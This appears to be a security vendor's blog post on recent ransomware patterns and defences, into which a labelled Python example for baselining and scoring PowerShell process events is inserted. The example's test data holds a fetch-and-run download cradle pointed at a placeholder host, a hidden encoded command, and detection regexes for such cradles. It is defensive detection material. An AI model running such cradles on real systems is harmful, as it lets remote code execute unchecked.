Real Ransomware Examples: How Recent Attacks Happened and What We Can Learn

Key takeaways:

  • Ransomware attacks are consistent, with attackers relying on the same combo of phishing, exposed RDP, and unpatched VPNs.

  • Businesses and organizations get ransomed because they lack visibility. During initial access, persistence, and privilege escalation, when ransomware is still stoppable, they miss the endpoint and identity signals that matter most.

  • Huntress Managed Endpoint Detection and Response (EDR) and Managed Security Information and Event Management (SIEM) combine endpoint, infrastructure, and system visibility with human-led investigation to detect abuse of legitimate tools, eliminate alert fatigue, and stop attackers before data is stolen and encryption begins.

No organization wants to be the subject of a ransomware case study. However, between all the recent breaches in the news, we've got enough material to publish a ransomware-themed encyclopedia. Jokes aside, you'll notice that almost every high-profile ransomware attack follows a similar pattern, yet businesses continue to fail at detecting these attacks for the same reasons. These real ransomware examples reveal consistent patterns that organizations can learn to disrupt early.

Let’s review some recently published ransomware case studies and dive into what your security teams can do about it.


Case studies of high-profile ransomware attacks

Initial access into the organization’s network can come from one little thing that may seem harmless at first—a legit-looking phishing message, an unpatched VPN, or exposed remote desktop (RDP).

Once the attacker has their beachhead, they don’t always have to be sophisticated. Oftentimes, it’s just an attacker who is abusing your open endpoint and using easily obtained ransomware-as-a-service (RaaS) kits. They’re not looking to outsmart your SIEM with advanced TTPs—they just won’t stop trying until they find a pattern you didn’t account for.

Recent examples include attacks that leveraged unpatched VPN vulnerabilities, compromised credentials through phishing campaigns, and exploited publicly accessible RDP services. LockBit affiliates, one of the largest ransomware groups before its disruption in 2024, frequently exploited RDP services to infiltrate networks. The BlackCat (ALPHV) operation used social engineering and phishing to steal credentials across healthcare and critical infrastructure. The Cactus ransomware group systematically targeted organizations with unpatched VPN appliances, particularly Fortinet and SonicWall vulnerabilities.




Tactics and techniques used by attackers

Attackers typically follow a predictable pattern. They usually gain initial access through:

  • Credential phishing: Attackers craft legitimate-looking emails that trick users into handing over their login information.

  • Remote access endpoints: RDP endpoints exposed to the internet are still a big thing. Businesses continue to leave these services accessible without adequate protection.

  • VPN vulnerabilities: Unpatched VPN appliances, like SonicWall vulnerabilities, are attractive targets for attackers who actively scan for and exploit these known weaknesses.

After compromising an endpoint, attackers elevate privileges, establish persistence, and move laterally to find valuable data.

They'll abuse admin tools already installed in your environment. PowerShell execution used for malicious purposes can appear identical to normal admin tasks in your monitoring solutions, making detection challenging without proper context.



How SMBs are affected and lessons learned

SMBs often don’t think they’re big or popular enough for "real" ransomware attackers. But SMB ransomware incidents are on the rise: SMBs face the same attack tools and techniques as larger organizations, but often have fewer resources to defend against them.

Recent ransomware case studies show that many SMB organizations lacked sufficient visibility into endpoint and identity telemetry. Security logs go unreviewed because there's no dedicated security analyst to monitor them.

Visibility is consistently one of the most critical gaps. In cases like the Evolve Bank breach, attackers had nearly four months of dwell time before detection. Security teams didn't detect ransomware infections in time to respond effectively. They also missed critical indicators like compromised credentials accessing files outside normal patterns, unfamiliar processes running on endpoints, and anomalous outbound network traffic that signaled data exfiltration or command and control communication.

As written in the Huntress 2025 Cyber Threat Report, ransomware operators are increasingly leaning into double extortion strategies, like stealing data before encrypting it, making early detection of data exfiltration even more important.




Preventive measures to avoid similar attacks

There are a few things you can do to avoid becoming the next ransomware case study.


Secure access points at your network perimeter

Firewall rules and VPNs provide important perimeter security, but only get you so far. If a cybercriminal succeeds at penetrating your defenses, you need to know what they’re doing inside your environment. Start with these fundamentals before an attack happens:


  • Implement MFA everywhere: Even if attackers obtain username and password combinations, multi-factor authentication (MFA) prevents them from using those credentials to access your systems.

  • Keep a rigorous patching schedule: Applications, VPNs, and RDP endpoints all have vulnerabilities. When software is up-to-date with security patches, it closes off known vulnerabilities that ransomware hackers frequently target.

  • Implement network segmentation: Network segmentation prevents lateral movement. If an attacker gets in, they can only do so much damage if it's contained to a small area of your network.

  • Practice your incident response plan: Your incident response plan should define escalation paths, stakeholder communication, data backup and recovery, and containment actions to take during specific attacks. Tabletop exercises make sure everyone knows their role during an incident and prepare them to perform when faced with pressure.


Focus on detection and response

Strengthen detection and response with comprehensive network and endpoint visibility.

Huntress Managed EDR provides endpoint visibility to detect ransomware activity before encryption begins, while Huntress Managed SIEM correlates security logs across your infrastructure to catch suspicious patterns that individual endpoints might miss.


Contain threats quickly

Speed matters. If you detect suspicious activity, contain it immediately—delays mean more damage and compromised systems. Huntress research shows attackers take an average of 17 hours from initial access to ransomware deployment.


Include human-led investigations

Automated tools are essential, but human analysts can identify subtle behavioral nuances that your security tools may miss. Combining automated detection with expert human investigation reduces your time to containment and improves the accuracy of threat identification.


Implement behavioral analysis

Behavioral analysis helps you identify activities that don't align with normal user patterns. When admin tools like PowerShell suddenly execute commands outside their normal usage patterns, that's a red flag. Detecting these actions early can stop breaches before they escalate.
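To make the behavioral-analysis idea concrete (and the earlier point that malicious PowerShell can look identical to admin work without context), here is an added Python example. It is not Huntress code and not from the original post: it learns a small baseline of PowerShell process-creation events (which host/user pairs run it, from which parent processes, during which hours) from a known-good window, then scores new events against that baseline with a few weighted signals. The hosts, users, timestamps, command lines, base64 blob and the placeholder URL are all constructed; the record fields only approximate a generic process-creation log such as Sysmon Event ID 1 and are an assumption, not any product's schema.

```python
"""Toy behavioral baseline for PowerShell process-creation events.

Added example: the records below are constructed, not real telemetry, and the
field names only approximate a generic process-creation log (Sysmon Event ID 1
style); they are an assumption, not any product's schema.
"""
from __future__ import annotations

import re
from dataclasses import dataclass, field
from datetime import datetime

# Parents that rarely have a legitimate reason to spawn PowerShell.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe"}
# -e / -enc / -EncodedCommand followed by a base64 blob.
ENCODED_FLAG = re.compile(r"(?i)(?:^|\s)-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}")
# Classic "fetch and run" patterns that deserve a second look in any command line.
DOWNLOAD_CRADLE = re.compile(r"(?i)downloadstring|downloadfile|invoke-webrequest|\biex\b|invoke-expression")


@dataclass
class ProcEvent:
    ts: datetime
    host: str
    user: str
    image: str
    parent: str
    cmdline: str


@dataclass
class Baseline:
    actors: set = field(default_factory=set)   # (host, user) pairs that routinely run PowerShell
    parents: set = field(default_factory=set)  # parent images seen launching PowerShell
    hours: set = field(default_factory=set)    # contiguous hour-of-day window of routine activity


def basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


def is_powershell(ev: ProcEvent) -> bool:
    return basename(ev.image) in {"powershell.exe", "pwsh.exe"}


def build_baseline(events) -> Baseline:
    """Learn what 'normal' PowerShell use looks like from a known-good window."""
    base = Baseline()
    hours = []
    for ev in events:
        if not is_powershell(ev):
            continue
        base.actors.add((ev.host.lower(), ev.user.lower()))
        base.parents.add(basename(ev.parent))
        hours.append(ev.ts.hour)
    if hours:  # treat the span between earliest and latest routine hour as working hours
        base.hours = set(range(min(hours), max(hours) + 1))
    return base


def score_event(ev: ProcEvent, base: Baseline):
    """Weighted deviation from baseline; 0 means the event looks routine."""
    if not is_powershell(ev):
        return 0, []
    reasons = []
    parent = basename(ev.parent)
    if (ev.host.lower(), ev.user.lower()) not in base.actors:
        reasons.append((1, "host/user pair never ran PowerShell in baseline"))
    if parent not in base.parents:
        reasons.append((1, f"unfamiliar parent process: {parent}"))
    if parent in OFFICE_PARENTS:
        reasons.append((2, "spawned by an Office application"))
    if ev.ts.hour not in base.hours:
        reasons.append((1, f"outside baseline hours ({ev.ts.hour:02d}:00)"))
    if ENCODED_FLAG.search(ev.cmdline):
        reasons.append((2, "encoded command line"))
    if DOWNLOAD_CRADLE.search(ev.cmdline):
        reasons.append((2, "download/remote-execution cradle in command line"))
    return sum(w for w, _ in reasons), [r for _, r in reasons]


def triage(events, base: Baseline, threshold: int = 2):
    """Return (host, user, score, reasons) for events at or above the alert threshold."""
    alerts = []
    for ev in events:
        score, reasons = score_event(ev, base)
        if score >= threshold:
            alerts.append((ev.host, ev.user, score, reasons))
    return alerts


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed "known-good" window: one admin running scheduled scripts during the day.
BASELINE_EVENTS = [
    ProcEvent(datetime(2025, 3, 3, 9, 5), "mgmt01", r"CORP\jsmith", PS, r"C:\Windows\explorer.exe", r"powershell.exe -File C:\scripts\backup.ps1"),
    ProcEvent(datetime(2025, 3, 3, 14, 30), "mgmt01", r"CORP\jsmith", PS, r"C:\Windows\System32\cmd.exe", r"powershell.exe -File C:\scripts\inventory.ps1"),
    ProcEvent(datetime(2025, 3, 4, 9, 10), "mgmt01", r"CORP\jsmith", PS, r"C:\Windows\explorer.exe", "powershell.exe Get-Service"),
]

# Constructed new events to score. The base64 blob decodes to "AAA" and the URL is a placeholder.
NEW_EVENTS = [
    ProcEvent(datetime(2025, 3, 5, 9, 40), "mgmt01", r"CORP\jsmith", PS, r"C:\Windows\explorer.exe", r"powershell.exe -File C:\scripts\backup.ps1"),
    ProcEvent(datetime(2025, 3, 5, 23, 40), "ws-042", r"CORP\alee", PS, r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE", "powershell.exe -nop -w hidden -enc QQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEA"),
    ProcEvent(datetime(2025, 3, 5, 10, 5), "mgmt01", r"CORP\jsmith", PS, r"C:\Windows\System32\cmd.exe", "powershell.exe -c \"IEX (New-Object Net.WebClient).DownloadString('http://placeholder.invalid/a.ps1')\""),
]

if __name__ == "__main__":
    for host, user, score, reasons in triage(NEW_EVENTS, build_baseline(BASELINE_EVENTS)):
        print(f"{host} {user} score={score}: {'; '.join(reasons)}")
```

The first new event is the same admin running the same backup script from Explorer during working hours and scores zero; the second is a new workstation user whose Outlook spawned a hidden, encoded PowerShell at 23:40 and stacks five signals; the third is the known admin from a known parent during working hours, which only the command-line content flags. That last case is the point of pairing baselining with content signals: the actor and timing look routine, so an alert keyed on "who" and "when" alone would miss it, and an alert keyed on PowerShell alone would drown in the admin's daily scripts.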




Turn these lessons into protection with Huntress

Attacks succeed when organizations lack visibility, respond slowly, or dismiss early warnings. They fail when defenders detect suspicious activity quickly and contain it before encryption begins.

Huntress Managed EDR and Managed SIEM provide the visibility and human-led investigation that turns the tables on ransomware operators. Get a demo and see how Huntress can help you fight ransomware.


